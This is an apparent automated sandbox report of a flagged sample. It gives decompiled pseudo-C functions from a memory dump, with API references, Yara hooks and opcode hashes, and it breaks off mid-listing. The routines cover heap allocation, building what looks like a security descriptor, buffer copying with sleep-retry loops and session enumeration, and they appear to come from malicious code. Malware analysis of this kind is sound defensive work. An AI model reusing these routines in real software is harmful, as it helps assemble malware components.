                                                                                                                                                                                                • Instruction ID: b1205d8ca8d486af30fba29e808c80cb099b6cd20addf273fe7e801ad33c5833
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3604a2caf5f0f1036a2b3a535c5e63340eec4202a12e6300b20e3694a98914
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DC002F06016099FFB0CDB2AED5481537E6EBA82013596868F42287631DF31DC51DA12
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF85E5, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85E5(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xb0e768, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                0x00af85f3
                                                                                                                                                                                                0x00af85fa

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: 1f1c0fd423e03f49ca8fd012741ed6e3af36617b006c4cc5e8b748f520205b47
                                                                                                                                                                                                • Instruction ID: 2eb90f8233c5e576626daf37058a749470ed1d85cda63f5fc867ba7ad9e22310
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f1c0fd423e03f49ca8fd012741ed6e3af36617b006c4cc5e8b748f520205b47
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11B09235080608BFEE411B81ED05A843F69EB24655F004050F6480A0709FA2A9649B85
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFB2AB, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFB2AB(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                                                                                                                                                                                                0x00afb2be

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00AF4E6E), ref: 00AFB2B1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                • Opcode ID: 97e4e1ec6a370aed331e33786c2cbd5d04f63ff41a2421b511837a5f53abaf80
                                                                                                                                                                                                • Instruction ID: 88094aa06e99b244f217fdbf21dbbf651d1421f60c5bea05fda529aa4644bda9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97e4e1ec6a370aed331e33786c2cbd5d04f63ff41a2421b511837a5f53abaf80
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DB092B62200014BCA185B38AA8484D32905B282313220B58B033C60E1DA21C8509A00
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF85D0, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85D0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xb0e768 = _t1;
				return _t1;
			}




                                                                                                                                                                                                0x00af85d9
                                                                                                                                                                                                0x00af85df
                                                                                                                                                                                                0x00af85e4

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                • Opcode ID: 2210fffd783628b6a1d46fca767a06391368a516721b566b849bc137e49bb059
                                                                                                                                                                                                • Instruction ID: 27a43589139109cf4ac75a66374c91c9fcba8294d0dbe85f07d89438b60347f6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2210fffd783628b6a1d46fca767a06391368a516721b566b849bc137e49bb059
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAB012706803009AF2501B205C06B003550A310B06F300001B7845A1D0DFB01004CA15
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFBD52, Relevance: 1.4, APIs: 1, Instructions: 149memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                			E00AFBD52() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0xb0e68c; // 0x4d3f890
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0xb0e68c; // 0x4d3f890
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0xb0e68c; // 0x4d3f890
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0xb0e688; // 0xb20000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0xb0e68c; // 0x4d3f890
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0xb0e68c; // 0x4d3f890
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0xb0e68c; // 0x4d3f890
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0xb0e68c; // 0x4d3f890
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0xb0e68c; // 0x4d3f890
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0xb0e68c; // 0x4d3f890
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































                                                                                                                                                                                                0x00afbd5d
                                                                                                                                                                                                0x00afbd60
                                                                                                                                                                                                0x00afbd68
                                                                                                                                                                                                0x00afbd6e
                                                                                                                                                                                                0x00afbd71
                                                                                                                                                                                                0x00afbd76
                                                                                                                                                                                                0x00afbd7c
                                                                                                                                                                                                0x00afbd7d
                                                                                                                                                                                                0x00afbd7e
                                                                                                                                                                                                0x00afbd7f
                                                                                                                                                                                                0x00afbd80
                                                                                                                                                                                                0x00afbd81
                                                                                                                                                                                                0x00afbd82
                                                                                                                                                                                                0x00afbd83
                                                                                                                                                                                                0x00afbd86
                                                                                                                                                                                                0x00afbd89
                                                                                                                                                                                                0x00afbd8b
                                                                                                                                                                                                0x00afbd8e
                                                                                                                                                                                                0x00afbd92
                                                                                                                                                                                                0x00afbd95
                                                                                                                                                                                                0x00afbd96
                                                                                                                                                                                                0x00afbd9b
                                                                                                                                                                                                0x00afbda2
                                                                                                                                                                                                0x00afbe96
                                                                                                                                                                                                0x00afbe9a
                                                                                                                                                                                                0x00afbe9c
                                                                                                                                                                                                0x00afbea4
                                                                                                                                                                                                0x00afbea4
                                                                                                                                                                                                0x00afbeab
                                                                                                                                                                                                0x00afbead
                                                                                                                                                                                                0x00afbeb5
                                                                                                                                                                                                0x00afbeb5
                                                                                                                                                                                                0x00afbeba
                                                                                                                                                                                                0x00afbebc
                                                                                                                                                                                                0x00afbec2
                                                                                                                                                                                                0x00afbec2
                                                                                                                                                                                                0x00afbec9
                                                                                                                                                                                                0x00afbecb
                                                                                                                                                                                                0x00afbed3
                                                                                                                                                                                                0x00afbed3
                                                                                                                                                                                                0x00afbed7
                                                                                                                                                                                                0x00afbedc
                                                                                                                                                                                                0x00afbedc
                                                                                                                                                                                                0x00afbdad
                                                                                                                                                                                                0x00afbdb0
                                                                                                                                                                                                0x00afbdb7
                                                                                                                                                                                                0x00afbdb8
                                                                                                                                                                                                0x00afbdbf
                                                                                                                                                                                                0x00afbdc2
                                                                                                                                                                                                0x00afbdc9
                                                                                                                                                                                                0x00afbdcc
                                                                                                                                                                                                0x00afbdd7
                                                                                                                                                                                                0x00afbde2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbde4
                                                                                                                                                                                                0x00afbde4
                                                                                                                                                                                                0x00afbde7
                                                                                                                                                                                                0x00afbde8
                                                                                                                                                                                                0x00afbde9
                                                                                                                                                                                                0x00afbdea
                                                                                                                                                                                                0x00afbdeb
                                                                                                                                                                                                0x00afbdec
                                                                                                                                                                                                0x00afbded
                                                                                                                                                                                                0x00afbdee
                                                                                                                                                                                                0x00afbdf0
                                                                                                                                                                                                0x00afbdf1
                                                                                                                                                                                                0x00afbdf5
                                                                                                                                                                                                0x00afbdf6
                                                                                                                                                                                                0x00afbe00
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe06
                                                                                                                                                                                                0x00afbe06
                                                                                                                                                                                                0x00afbe0b
                                                                                                                                                                                                0x00afbe0d
                                                                                                                                                                                                0x00afbe0f
                                                                                                                                                                                                0x00afbe10
                                                                                                                                                                                                0x00afbe17
                                                                                                                                                                                                0x00afbe1a
                                                                                                                                                                                                0x00afbe21
                                                                                                                                                                                                0x00afbe24
                                                                                                                                                                                                0x00afbe27
                                                                                                                                                                                                0x00afbe27
                                                                                                                                                                                                0x00afbe2a
                                                                                                                                                                                                0x00afbe2d
                                                                                                                                                                                                0x00afbe2e
                                                                                                                                                                                                0x00afbe32
                                                                                                                                                                                                0x00afbe33
                                                                                                                                                                                                0x00afbe38
                                                                                                                                                                                                0x00afbe3e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe4a
                                                                                                                                                                                                0x00afbe4e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe50
                                                                                                                                                                                                0x00afbe56
                                                                                                                                                                                                0x00afbe58
                                                                                                                                                                                                0x00afbe61
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe63
                                                                                                                                                                                                0x00afbe68
                                                                                                                                                                                                0x00afbe69
                                                                                                                                                                                                0x00afbe6c
                                                                                                                                                                                                0x00afbe6e
                                                                                                                                                                                                0x00afbe77
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe7c
                                                                                                                                                                                                0x00afbe7e
                                                                                                                                                                                                0x00afbe86
                                                                                                                                                                                                0x00afbe86
                                                                                                                                                                                                0x00afbe89
                                                                                                                                                                                                0x00afbe91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe91
                                                                                                                                                                                                0x00afbe00

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AFBE44
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                                                • Opcode ID: 59100356812aa89ac76d63a9f37a06c647e9385b368d25993c9c8494c60d64d8
                                                                                                                                                                                                • Instruction ID: 3091ade37c26b2bd12b4420149e86318af4e77ab4b7826d1a425b56254597231
                                                                                                                                                                                                • Opcode Fuzzy Hash: 59100356812aa89ac76d63a9f37a06c647e9385b368d25993c9c8494c60d64d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF513B71A10208EFDB14CFD9D988AEDBBF8FF54701F11856AF214AB260D7718944CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFFA01, Relevance: 1.4, APIs: 1, Instructions: 117sleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                			E00AFFA01(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t25;
				char _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t35;
				char _t37;
				intOrPtr _t38;
				char _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr* _t62;
				intOrPtr _t65;
				char* _t66;
				intOrPtr _t68;
				char _t77;
				void* _t80;
				void* _t81;

				_t25 =  *0xb0e654; // 0x4d3fb08
				_t26 = E00AF85E5( *((intOrPtr*)(_t25 + 4))); // executed
				_v12 = _t26;
				if(_t26 != 0) {
					_t62 =  *0xb0e654; // 0x4d3fb08
					if( *((intOrPtr*)(_t62 + 4)) > 0x400) {
						E00AF86C2(_t26,  *_t62, 0x400);
						_v8 = 0;
						_t35 = E00AF109A(_t62, 0x34a);
						_t65 =  *0xb0e688; // 0xb20000
						_t71 =  !=  ? 0x67d : 0x615;
						_t37 = E00AF95C2(_t65,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t35);
						_t66 = "\\";
						_v24 = _t37;
						_push(_t66);
						_push(_t37);
						_t38 =  *0xb0e688; // 0xb20000
						_push(_t66);
						_v20 = E00AF92C6(_t38 + 0x1020);
						_t41 = E00AFA6EB( &_v8, _t40,  &_v8); // executed
						_v16 = _t41;
						E00AF85B6( &_v24);
						E00AF85B6( &_v20);
						_t72 = _v16;
						_t81 = _t80 + 0x3c;
						_t68 = _v8;
						if(_v16 != 0 && _t68 > 0x400) {
							_t50 =  *0xb0e654; // 0x4d3fb08
							_t51 =  *((intOrPtr*)(_t50 + 4));
							_t52 =  <  ? _t68 : _t51;
							_t53 = ( <  ? _t68 : _t51) + 0xfffffc00;
							E00AF86C2(_v12 + 0x400, _t72 + 0x400, ( <  ? _t68 : _t51) + 0xfffffc00);
							_t68 = _v8;
							_t81 = _t81 + 0xc;
						}
						E00AF85FB( &_v16, _t68); // executed
						E00AF85FB( &_v20, 0xfffffffe);
						_t26 = _v12;
						_t80 = _t81 + 0x10;
					}
					_t77 = 0;
					while(1) {
						_t28 =  *0xb0e688; // 0xb20000
						_t30 = E00AFA7BF(_t28 + 0x228, _t26, 0x1000); // executed
						_t80 = _t80 + 0xc;
						if(_t30 >= 0) {
							break;
						}
						Sleep(1);
						_t77 = _t77 + 1;
						if(_t77 < 0x2710) {
							_t26 = _v12;
							continue;
						}
						break;
					}
					E00AF85FB( &_v12, 0); // executed
				}
				return 0;
			}

























                                                                                                                                                                                                0x00affa07
                                                                                                                                                                                                0x00affa0f
                                                                                                                                                                                                0x00affa14
                                                                                                                                                                                                0x00affa1a
                                                                                                                                                                                                0x00affa20
                                                                                                                                                                                                0x00affa33
                                                                                                                                                                                                0x00affa3d
                                                                                                                                                                                                0x00affa47
                                                                                                                                                                                                0x00affa4a
                                                                                                                                                                                                0x00affa4f
                                                                                                                                                                                                0x00affa65
                                                                                                                                                                                                0x00affa69
                                                                                                                                                                                                0x00affa6e
                                                                                                                                                                                                0x00affa6f
                                                                                                                                                                                                0x00affa70
                                                                                                                                                                                                0x00affa75
                                                                                                                                                                                                0x00affa78
                                                                                                                                                                                                0x00affa79
                                                                                                                                                                                                0x00affa7a
                                                                                                                                                                                                0x00affa7f
                                                                                                                                                                                                0x00affa8e
                                                                                                                                                                                                0x00affa93
                                                                                                                                                                                                0x00affa98
                                                                                                                                                                                                0x00affa9f
                                                                                                                                                                                                0x00affaa8
                                                                                                                                                                                                0x00affaad
                                                                                                                                                                                                0x00affab0
                                                                                                                                                                                                0x00affab3
                                                                                                                                                                                                0x00affab8
                                                                                                                                                                                                0x00affabe
                                                                                                                                                                                                0x00affac3
                                                                                                                                                                                                0x00affac8
                                                                                                                                                                                                0x00affacb
                                                                                                                                                                                                0x00affade
                                                                                                                                                                                                0x00affae3
                                                                                                                                                                                                0x00affae6
                                                                                                                                                                                                0x00affae6
                                                                                                                                                                                                0x00affaee
                                                                                                                                                                                                0x00affaf9
                                                                                                                                                                                                0x00affafe
                                                                                                                                                                                                0x00affb01
                                                                                                                                                                                                0x00affb01
                                                                                                                                                                                                0x00affb04
                                                                                                                                                                                                0x00affb06
                                                                                                                                                                                                0x00affb0c
                                                                                                                                                                                                0x00affb17
                                                                                                                                                                                                0x00affb1c
                                                                                                                                                                                                0x00affb21
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb2a
                                                                                                                                                                                                0x00affb30
                                                                                                                                                                                                0x00affb37
                                                                                                                                                                                                0x00affb39
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb39
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb37
                                                                                                                                                                                                0x00affb43
                                                                                                                                                                                                0x00affb4c
                                                                                                                                                                                                0x00affb50

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,00AFF8F7,?,?,?,00AFFCF1,00000000), ref: 00AFFB2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeapSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4201116106-0
                                                                                                                                                                                                • Opcode ID: b58cca6b5362106df53669fbcb4b0e1f5560e87606919650e87e3da37c9f1c2f
                                                                                                                                                                                                • Instruction ID: 5523a64041df63d9c44f4c34a63b5b15505c492222a2c51e01ef6e0c05a58844
                                                                                                                                                                                                • Opcode Fuzzy Hash: b58cca6b5362106df53669fbcb4b0e1f5560e87606919650e87e3da37c9f1c2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD318B72A00208AFDB00EBE8DE86EBEB3B9EF54304F104579B615E7241EE35DA418750
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF8950, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                			E00AF8950(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00AF85E5(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00AF85E5(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E00AF87CB(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E00AF85FB( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0xb0e684; // 0x4d3f6c8
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E00AF85FB(_t73, 0);
						}
						E00AF85FB( &_v20, 0);
						goto L1;
					}
					_t43 = E00AFA6EB(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00AF87F6(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E00AF85FB( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















                                                                                                                                                                                                0x00af8956
                                                                                                                                                                                                0x00af895d
                                                                                                                                                                                                0x00af895f
                                                                                                                                                                                                0x00af8967
                                                                                                                                                                                                0x00af8969
                                                                                                                                                                                                0x00af8971
                                                                                                                                                                                                0x00af8973
                                                                                                                                                                                                0x00af8976
                                                                                                                                                                                                0x00af8979
                                                                                                                                                                                                0x00af898d
                                                                                                                                                                                                0x00af8994
                                                                                                                                                                                                0x00af899a
                                                                                                                                                                                                0x00af89a3
                                                                                                                                                                                                0x00af89fb
                                                                                                                                                                                                0x00af8a00
                                                                                                                                                                                                0x00af8a09
                                                                                                                                                                                                0x00af8a56
                                                                                                                                                                                                0x00af8a59
                                                                                                                                                                                                0x00af8a61
                                                                                                                                                                                                0x00af8a65
                                                                                                                                                                                                0x00af8a65
                                                                                                                                                                                                0x00af8a6a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af8a6a
                                                                                                                                                                                                0x00af8a0b
                                                                                                                                                                                                0x00af8a0d
                                                                                                                                                                                                0x00af8a15
                                                                                                                                                                                                0x00af8a1b
                                                                                                                                                                                                0x00af8a1c
                                                                                                                                                                                                0x00af8a1c
                                                                                                                                                                                                0x00af8a24
                                                                                                                                                                                                0x00af8a27
                                                                                                                                                                                                0x00af8a2c
                                                                                                                                                                                                0x00af8a2c
                                                                                                                                                                                                0x00af8a2f
                                                                                                                                                                                                0x00af8a38
                                                                                                                                                                                                0x00af8a3d
                                                                                                                                                                                                0x00af8a43
                                                                                                                                                                                                0x00af8a4a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af8a50
                                                                                                                                                                                                0x00af89ac
                                                                                                                                                                                                0x00af89b1
                                                                                                                                                                                                0x00af89b3
                                                                                                                                                                                                0x00af89ba
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89cf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89d1
                                                                                                                                                                                                0x00af89d1
                                                                                                                                                                                                0x00af89dc
                                                                                                                                                                                                0x00af89df
                                                                                                                                                                                                0x00af89ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89f2
                                                                                                                                                                                                0x00af89cf
                                                                                                                                                                                                0x00af897b
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 00AF899A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeaplstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 680773602-0
                                                                                                                                                                                                • Opcode ID: d6bcd826cf22882dd0057115f6cb4ed38edd907e76f58f6159eeb9a57f6bcedd
                                                                                                                                                                                                • Instruction ID: 93ea776ac11a4cc509672d6d25584c5fa00a3c9625da1172f516d0d3e43bb235
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6bcd826cf22882dd0057115f6cb4ed38edd907e76f58f6159eeb9a57f6bcedd
                                                                                                                                                                                                • Instruction Fuzzy Hash: A331C672A00709AFDB10ABE8DD41BBEB7B8EF40760F21441AF755D7181DF78AA018B58
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFE308, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E00AFE308(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0xb0e6b4; // 0x4d3f870, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0xb0e6b4; // 0x4d3f870
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0xb0e68c; // 0x4d3f890
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00AF85E5(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0xb0e68c; // 0x4d3f890
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00AF48F8(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















                                                                                                                                                                                                0x00afe308
                                                                                                                                                                                                0x00afe31b
                                                                                                                                                                                                0x00afe322
                                                                                                                                                                                                0x00afe32b
                                                                                                                                                                                                0x00afe333
                                                                                                                                                                                                0x00afe339
                                                                                                                                                                                                0x00afe33e
                                                                                                                                                                                                0x00afe349
                                                                                                                                                                                                0x00afe34e
                                                                                                                                                                                                0x00afe3e7
                                                                                                                                                                                                0x00afe3e7
